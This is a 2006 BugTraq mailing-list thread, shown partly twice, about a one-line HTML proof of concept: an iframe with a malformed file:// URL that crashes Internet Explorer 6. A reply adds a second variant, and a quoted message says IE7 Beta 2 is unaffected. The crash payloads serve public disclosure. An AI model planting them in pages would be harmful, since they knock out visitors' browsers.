BugTraq
Back to list
|
Post reply
RE: Internet Explorer vulnerbility
Jun 09 2006 12:21AM
Greg Merideth (Forward Technology) (gmerideth forwardtechnology net)
(1 replies)
Re: RE: Internet Explorer vulnerbility
Jun 12 2006 09:40PM
Charles Hamby (fixer gci net)
If you change:
<HTLM><BODY><IFRAME src="File://þ:/"></BODY></HTML>
to:
<HTLM><BODY><IFRAME src="File://%f%f%f%f:/"></BODY></HTML>
it will also crash IE 6.x. Don't know about 7 Beta.
-cdh
----- Original Message -----
From: "Greg Merideth (Forward Technology)" <gmerideth (at) forwardtechnology (dot) net [email concealed]>
Date: Monday, June 12, 2006 1:18 pm
Subject: RE: Internet Explorer vulnerbility
To: Mr.Niega (at) gmail (dot) com [email concealed], bugtraq (at) securityfocus (dot) com [email concealed]
> IE7 Beta 2 build [7.0.5346.5] parses without crashing.
>
> Greg Merideth
> Forward Technology, LLC.
> CTO & Other Wild Stuff
> gmerideth (at) forwardtechnology (dot) net [email concealed]
> PGP Fingerprint
> 18C3CE191171736225D62C3829F7B18A00F2AC0C
>
> -----Original Message-----
> From: Mr.Niega (at) gmail (dot) com [email concealed] [mailto:Mr.Niega (at) gmail (dot) com [email concealed]]
> Sent: Thursday, June 08, 2006 3:01 PM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: Internet Explorer vulnerbility
>
> /*
> *
> * Internet Explorer Crash [Proof of concept]
> * Bug discovered by MarjinZ & Mr.Niega
> * http://www.swerat.com/
> *
> * Affected Software: Internet explorer
> * Severity: Unknown
> * Impact: Crash
> * Solution Status: Unpatched
> *
> * E-Mail: Mr.Niega (at) gmail (dot) com [email concealed] & MarjinZ (at) gmail (dot) com [email concealed]
> * __ __ __ __
> *| \/ | __ _| \/ |
> *| |\/| |/ _` | |\/| |
> *| | | | | | | | | |
> *|_| |_|_| |_|_| |_|
> * Credits goes out to GärBiz a.k.a *Gabriel,Garbiz,Gabbelito,Gärbpiz
> * K@2@nj@n §w¤nn§0n
> *
> */
> <HTLM><BODY><IFRAME src="File://þ:/"></BODY></HTML>
>
>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
<HTLM><BODY><IFRAME src="File://þ:/"></BODY></HTML>
to:
<HTLM><BODY><IFRAME src="File://%f%f%f%f:/"></BODY></HTML>
it will also crash IE 6.x. Don't know about 7 Beta.
-cdh
----- Original Message -----
From: "Greg Merideth (Forward Technology)" <gmerideth (at) forwardtechnology (dot) net [email concealed]>
Date: Monday, June 12, 2006 1:18 pm
Subject: RE: Internet Explorer vulnerbility
To: Mr.Niega (at) gmail (dot) com [email concealed], bugtraq (at) securityfocus (dot) com [email concealed]
> IE7 Beta 2 build [7.0.5346.5] parses without crashing.
>
> Greg Merideth
> Forward Technology, LLC.
> CTO & Other Wild Stuff
> gmerideth (at) forwardtechnology (dot) net [email concealed]
> PGP Fingerprint
> 18C3CE191171736225D62C3829F7B18A00F2AC0C
>
> -----Original Message-----
> From: Mr.Niega (at) gmail (dot) com [email concealed] [mailto:Mr.Niega (at) gmail (dot) com [email concealed]]
> Sent: Thursday, June 08, 2006 3:01 PM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: Internet Explorer vulnerbility
>
> /*
> *
> * Internet Explorer Crash [Proof of concept]
> * Bug discovered by MarjinZ & Mr.Niega
> * http://www.swerat.com/
> *
> * Affected Software: Internet explorer
> * Severity: Unknown
> * Impact: Crash
> * Solution Status: Unpatched
> *
> * E-Mail: Mr.Niega (at) gmail (dot) com [email concealed] & MarjinZ (at) gmail (dot) com [email concealed]
> * __ __ __ __
> *| \/ | __ _| \/ |
> *| |\/| |/ _` | |\/| |
> *| | | | | | | | | |
> *|_| |_|_| |_|_| |_|
> * Credits goes out to GärBiz a.k.a *Gabriel,Garbiz,Gabbelito,Gärbpiz
> * K@2@nj@n §w¤nn§0n
> *
> */
> <HTLM><BODY><IFRAME src="File://þ:/"></BODY></HTML>
>
>
[ reply ]